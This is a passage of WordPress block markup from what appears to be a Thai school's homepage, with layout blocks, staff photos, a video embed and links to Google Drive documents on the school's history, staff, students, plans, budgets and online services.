class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC 